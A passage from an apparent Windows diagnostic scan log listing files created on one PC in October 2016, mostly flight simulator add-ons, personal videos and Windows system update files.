Aniel\Downloads\ont2012x 2016-10-17 21:26 - 2016-10-17 21:26 - 40738663 _____ C:\Users\Kyle Aniel\Downloads\ont2012x.zip 2016-10-17 21:26 - 2016-10-17 21:26 - 00590905 _____ C:\Users\Kyle Aniel\Downloads\ont2012xnj.zip 2016-10-17 21:17 - 2016-10-17 21:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\md80_cls_american_airlines 2016-10-17 21:16 - 2016-10-17 21:17 - 04223899 _____ C:\Users\Kyle Aniel\Downloads\md80_cls_american_airlines.zip 2016-10-17 20:22 - 2016-10-17 20:22 - 16057249 _____ C:\Users\Kyle Aniel\Downloads\Panama City Beach Sunset Time-Lapse.mp4 2016-10-17 19:20 - 2016-10-17 19:35 - 681446176 _____ C:\Users\Kyle Aniel\Desktop\nana project.mp4 2016-10-17 19:17 - 2016-10-17 19:34 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\New folder (2) 2016-10-17 18:43 - 2016-10-17 18:43 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\2016-10 2016-10-16 20:26 - 2016-10-16 20:26 - 03546096 _____ C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen (1).zip 2016-10-16 20:26 - 2016-10-16 20:26 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\35554 2016-10-16 20:22 - 2016-10-16 20:25 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen 2016-10-16 20:22 - 2016-10-16 20:23 - 84771760 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super80-Professional.exe 2016-10-16 20:22 - 2016-10-16 20:22 - 05123441 _____ C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen.zip 2016-10-16 17:58 - 2016-10-16 19:33 - 00148096 _____ C:\Users\Kyle Aniel\Desktop\nana project.wlmp 2016-10-16 17:17 - 2016-10-16 17:18 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\edited picture 2016-10-16 08:53 - 2016-10-16 09:07 - 00000165 _____ C:\Users\Kyle Aniel\Desktop\New Text Document (3).txt 2016-10-16 06:34 - 2016-10-18 19:40 - 00002597 _____ C:\Users\Public\Desktop\AESHelp for FSX.lnk 2016-10-16 06:32 - 2016-10-16 06:32 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Aerosoft - Airport Enhancement Services (AES)2.21 2016-10-16 06:31 - 2016-10-16 06:31 - 59054928 _____ C:\Users\Kyle Aniel\Downloads\Aerosoft - Airport Enhancement Services (AES)2.21.rar 2016-10-15 21:18 - 2010-08-19 22:47 - 00000017 _____ C:\Users\Kyle Aniel\Desktop\FSINN.cfg 2016-10-15 21:17 - 2016-10-15 21:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\MD-8x 2016-10-15 21:11 - 2016-10-15 21:11 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC 4.858 2016-10-15 21:03 - 2016-10-15 21:10 - 09338380 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC 4.858.rar 2016-10-15 16:49 - 2016-10-15 17:00 - 2048196608 _____ C:\Users\Kyle Aniel\Downloads\7601.17514.101119-1850_Update_Sp_Wave1-GRMSP1.1_DVD.iso 2016-10-15 15:23 - 2016-10-15 15:24 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\boeing777v2 2016-10-15 15:22 - 2016-10-15 15:23 - 07004238 _____ C:\Users\Kyle Aniel\Downloads\boeing777v2.zip 2016-10-15 15:07 - 2016-10-15 15:07 - 01567616 _____ C:\Users\Kyle Aniel\Downloads\p787msx.zip 2016-10-15 11:57 - 2016-10-15 11:58 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Fs_Panel_Studio_keygen_by_Inferno 2016-10-15 11:57 - 2016-10-15 11:57 - 05050888 _____ C:\Users\Kyle Aniel\Downloads\Fs_Panel_Studio_keygen_by_Inferno.zip 2016-10-15 09:35 - 2016-10-15 09:35 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\BOEING_777_Panel 2016-10-15 09:32 - 2016-10-15 09:32 - 02200036 _____ C:\Users\Kyle Aniel\Downloads\BOEING_777_Panel.zip 2016-10-15 09:18 - 2016-10-15 09:18 - 28339782 _____ C:\Users\Kyle Aniel\Downloads\skyspirit2012_american_airlines_boeing_777-300er_n717an.zip 2016-10-15 09:18 - 2016-10-15 09:18 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\skyspirit2012_american_airlines_boeing_777-300er_n717an 2016-10-15 09:07 - 2016-10-15 09:08 - 55849165 _____ C:\Users\Kyle Aniel\Downloads\SkySpirit-PSS-B777-300ER-Merge.rar 2016-10-15 09:07 - 2016-10-15 09:07 - 10424790 _____ C:\Users\Kyle Aniel\Downloads\SKYSPIRIT2012 777-300ER American Airlines N717AN 2013.rar 2016-10-15 07:57 - 2016-10-15 07:57 - 00018081 _____ C:\Users\Kyle Aniel\Downloads\f-s-x-777-300-expansion-models.torrent 2016-10-14 23:46 - 2016-10-14 23:46 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSND_FSX_MD83 2016-10-14 23:44 - 2016-10-14 23:46 - 67436368 _____ C:\Users\Kyle Aniel\Downloads\FSND_FSX_MD83.zip 2016-10-14 23:16 - 2016-10-14 23:16 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Microsoft_Flight_Simulator_X_Deluxe_Edition 2016-10-14 22:55 - 2016-10-14 22:55 - 03794912 _____ C:\Users\Kyle Aniel\Downloads\MJ772BHC.zip 2016-10-14 22:55 - 2016-10-14 22:55 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\MJ772BHC 2016-10-14 22:53 - 2016-10-14 22:53 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\em77fsx 2016-10-14 22:44 - 2016-10-14 22:50 - 16805219 _____ C:\Users\Kyle Aniel\Downloads\em77fsx.zip 2016-10-13 21:00 - 2016-10-13 21:11 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CLS Boeing 747-200 v1 2016-10-13 20:38 - 2016-10-18 19:38 - 00001243 _____ C:\Users\banie_000\Desktop\Jed's Half-Life Model Viewer.lnk 2016-10-13 20:38 - 2016-10-13 20:38 - 00195825 _____ C:\Users\Kyle Aniel\Downloads\hlmv136_setup.zip 2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\hlmv136_setup 2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jed's Half-Life Model Viewer 1.3.6 2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Program Files (x86)\Jed's Half-Life Model Viewer 1.3.6 2016-10-13 20:36 - 2016-10-13 20:36 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Blender Foundation 2016-10-13 19:26 - 2016-10-13 19:26 - 00000210 _____ C:\MD81_.ini 2016-10-13 17:24 - 2016-10-13 17:24 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC 4.927a_&_WideFS_6.995 2016-10-13 17:21 - 2016-10-13 17:21 - 04526316 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC 4.927a_&_WideFS_6.995.rar 2016-10-13 17:16 - 2016-10-13 17:21 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC4 2016-10-13 17:16 - 2016-10-13 17:16 - 03988172 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC4.zip 2016-10-13 16:53 - 2016-10-18 19:38 - 00001644 _____ C:\Users\banie_000\Desktop\Where are the manuals.doc.lnk 2016-10-13 16:53 - 2016-10-18 19:38 - 00001614 _____ C:\Users\banie_000\Desktop\RFP June Update.doc.lnk 2016-10-13 16:51 - 2016-10-13 16:51 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ready_for_pushback_boeing_747-200v2_fs2004 2016-10-13 15:28 - 2016-10-05 03:34 - 01051104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2016-10-13 15:28 - 2016-10-05 03:34 - 00894088 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe 2016-10-13 15:28 - 2016-10-05 03:31 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2016-10-13 15:28 - 2016-10-05 03:31 - 01353768 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2016-10-13 15:28 - 2016-10-05 03:31 - 01172472 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2016-10-13 15:28 - 2016-10-05 03:17 - 01322848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll 2016-10-13 15:28 - 2016-10-05 03:13 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2016-10-13 15:28 - 2016-10-05 03:13 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll 2016-10-13 15:28 - 2016-10-05 03:13 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll 2016-10-13 15:28 - 2016-10-05 03:12 - 02446696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll 2016-10-13 15:28 - 2016-10-05 03:12 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys 2016-10-13 15:28 - 2016-10-05 03:09 - 22219328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2016-10-13 15:28 - 2016-10-05 03:09 - 00064352 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\MegaSas2i.sys 2016-10-13 15:28 - 2016-10-05 03:03 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2016-10-13 15:28 - 2016-10-05 02:51 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll 2016-10-13 15:28 - 2016-10-05 02:50 - 02256592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-10-13 15:28 - 2016-10-05 02:46 - 03892352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll 2016-10-13 15:28 - 2016-10-05 02:46 - 00980824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll 2016-10-13 15:28 - 2016-10-05 02:45 - 20965240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2016-10-13 15:28 - 2016-10-05 02:44 - 22568960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2016-10-13 15:28 - 2016-10-05 02:41 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2016-10-13 15:28 - 2016-10-05 02:38 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll 2016-10-13 15:28 - 2016-10-05 02:38 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll 2016-10-13 15:28 - 2016-10-05 02:36 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll 2016-10-13 15:28 - 2016-10-05 02:35 - 00327680 _____ C:\WINDOWS\system32\wc_storage.dll 2016-10-13 15:28 - 2016-10-05 02:35 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll 2016-10-13 15:28 - 2016-10-05 02:35 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll 2016-10-13 15:28 - 2016-10-05 02:34 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2016-10-13 15:28 - 2016-10-05 02:33 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll 2016-10-13 15:28 - 2016-10-05 02:33 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll 2016-10-13 15:28 - 2016-10-05 02:33 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll 2016-10-13 15:28 - 2016-10-05 02:33 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovs.dll 2016-10-13 15:28 - 2016-10-05 02:32 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll 2016-10-13 15:28 - 2016-10-05 02:32 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll 2016-10-13 15:28 - 2016-10-05 02:32 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll 2016-10-13 15:28 - 2016-10-05 02:31 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll 2016-10-13 15:28 - 2016-10-05 02:31 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll 2016-10-13 15:28 - 2016-10-05 02:31 - 00480768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll 2016-10-13 15:28 - 2016-10-05 02:31 - 00425472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe 2016-10-13 15:28 - 2016-10-05 02:30 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll 2016-10-13 15:28 - 2016-10-05 02:29 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2016-10-13 15:28 - 2016-10-05 02:29 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll 2016-10-13 15:28 - 2016-10-05 02:28 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll 2016-10-13 15:28 - 2016-10-05 02:28 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll 2016-10-13 15:28 - 2016-10-05 02:27 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll 2016-10-13 15:28 - 2016-10-05 02:27 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 23680512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 00137216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovs.dll 2016-10-13 15:28 - 2016-10-05 02:26 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.Ngc.dll 2016-10-13 15:28 - 2016-10-05 02:25 - 01589248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll 2016-10-13 15:28 - 2016-10-05 02:25 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll 2016-10-13 15:28 - 2016-10-05 02:25 - 00404992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll 2016-10-13 15:28 - 2016-10-05 02:25 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll 2016-10-13 15:28 - 2016-10-05 02:25 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll 2016-10-13 15:28 - 2016-10-05 02:24 - 13434368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll 2016-10-13 15:28 - 2016-10-05 02:24 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll 2016-10-13 15:28 - 2016-10-05 02:24 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\adsmsext.dll 2016-10-13 15:28 - 2016-10-05 02:23 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll 2016-10-13 15:28 - 2016-10-05 02:23 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll 2016-10-13 15:28 - 2016-10-05 02:23 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll 2016-10-13 15:28 - 2016-10-05 02:23 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll 2016-10-13 15:28 - 2016-10-05 02:23 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll 2016-10-13 15:28 - 2016-10-05 02:22 - 13081088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-10-13 15:28 - 2016-10-05 02:21 - 08075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll 2016-10-13 15:28 - 2016-10-05 02:21 - 03689984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll 2016-10-13 15:28 - 2016-10-05 02:21 - 01364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll 2016-10-13 15:28 - 2016-10-05 02:21 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll 2016-10-13 15:28 - 2016-10-05 02:20 - 00804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll 2016-10-13 15:28 - 2016-10-05 02:20 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll 2016-10-13 15:28 - 2016-10-05 02:20 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys 2016-10-13 15:28 - 2016-10-05 02:19 - 02390016 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe 2016-10-13 15:28 - 2016-10-05 02:19 - 02265088 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2016-10-13 15:28 - 2016-10-05 02:19 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2016-10-13 15:28 - 2016-10-05 02:19 - 00982528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll 2016-10-13 15:28 - 2016-10-05 02:18 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2016-10-13 15:28 - 2016-10-05 02:18 - 00983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll 2016-10-13 15:28 - 2016-10-05 02:18 - 00911872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll 2016-10-13 15:28 - 2016-10-05 02:18 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll 2016-10-13 15:28 - 2016-10-05 02:18 - 00759296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-10-13 15:28 - 2016-10-05 02:17 - 08126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2016-10-13 15:28 - 2016-10-05 02:17 - 02914304 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll 2016-10-13 15:28 - 2016-10-05 02:17 - 01493504 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2016-10-13 15:28 - 2016-10-05 02:16 - 19418624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2016-10-13 15:28 - 2016-10-05 02:16 - 04747776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-10-13 15:28 - 2016-10-05 02:16 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll 2016-10-13 15:28 - 2016-10-05 02:16 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-10-13 15:28 - 2016-10-05 02:15 - 07625728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2016-10-13 15:28 - 2016-10-05 02:15 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll 2016-10-13 15:28 - 2016-10-05 02:15 - 01980416 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll 2016-10-13 15:28 - 2016-10-05 02:15 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2016-10-13 15:28 - 2016-10-05 02:15 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll 2016-10-13 15:28 - 2016-10-05 02:15 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 02667520 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 02476544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 01778176 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 12345856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll 2016-10-13 15:28 - 2016-10-05 02:12 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2016-10-13 15:28 - 2016-10-05 02:12 - 00998912 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll 2016-10-13 15:28 - 2016-10-05 02:12 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll 2016-10-13 15:28 - 2016-10-05 02:11 - 12174848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-10-13 15:28 - 2016-10-05 02:11 - 06108672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll 2016-10-13 15:28 - 2016-10-05 02:11 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2016-10-13 15:28 - 2016-10-05 02:11 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll 2016-10-13 15:28 - 2016-10-05 02:10 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe 2016-10-13 15:28 - 2016-10-05 02:09 - 07467520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll 2016-10-13 15:28 - 2016-10-05 02:09 - 03369984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll 2016-10-13 15:28 - 2016-10-05 02:09 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll 2016-10-13 15:28 - 2016-10-05 02:09 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll 2016-10-13 15:28 - 2016-10-05 02:09 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-10-13 15:28 - 2016-10-05 02:08 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2016-10-13 15:28 - 2016-10-05 02:07 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-10-13 15:28 - 2016-10-05 02:07 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll 2016-10-13 15:28 - 2016-10-05 02:07 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll 2016-10-13 15:28 - 2016-10-05 02:07 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 02999296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2016-10-13 15:28 - 2016-10-05 02:06 - 02254336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll 2016-10-13 15:28 - 2016-10-05 02:05 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe 2016-10-13 15:28 - 2016-10-05 02:05 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll 2016-10-13 15:28 - 2016-09-06 22:34 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe 2016-10-13 15:27 - 2016-10-05 03:35 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys 2016-10-13 15:27 - 2016-10-05 03:33 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys 2016-10-13 15:27 - 2016-10-05 03:30 - 07812448 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2016-10-13 15:27 - 2016-10-05 03:22 - 01181536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys 2016-10-13 15:27 - 2016-10-05 03:16 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys 2016-10-13 15:27 - 2016-10-05 03:12 - 01112928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll 2016-10-13 15:27 - 2016-10-05 03:09 - 04129928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll 2016-10-13 15:27 - 2016-10-05 03:09 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll 2016-10-13 15:27 - 2016-10-05 03:09 - 00244816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2016-10-13 15:27 - 2016-10-05 03:08 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll 2016-10-13 15:27 - 2016-10-05 03:04 - 02537824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2016-10-13 15:27 - 2016-10-05 03:04 - 00628032 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2016-10-13 15:27 - 2016-10-05 02:50 - 00116576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll 2016-10-13 15:27 - 2016-10-05 02:49 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll 2016-10-13 15:27 - 2016-10-05 02:48 - 01022304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll 2016-10-13 15:27 - 2016-10-05 02:46 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll 2016-10-13 15:27 - 2016-10-05 02:36 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthpan.sys 2016-10-13 15:27 - 2016-10-05 02:36 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll 2016-10-13 15:27 - 2016-10-05 02:35 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll 2016-10-13 15:27 - 2016-10-05 02:35 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll 2016-10-13 15:27 - 2016-10-05 02:34 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys 2016-10-13 15:27 - 2016-10-05 02:32 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll 2016-10-13 15:27 - 2016-10-05 02:31 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll 2016-10-13 15:27 - 2016-10-05 02:31 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll 2016-10-13 15:27 - 2016-10-05 02:31 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ConfigureExpandedStorage.dll 2016-10-13 15:27 - 2016-10-05 02:29 - 09129984 _____ (Microsoft Corporation) 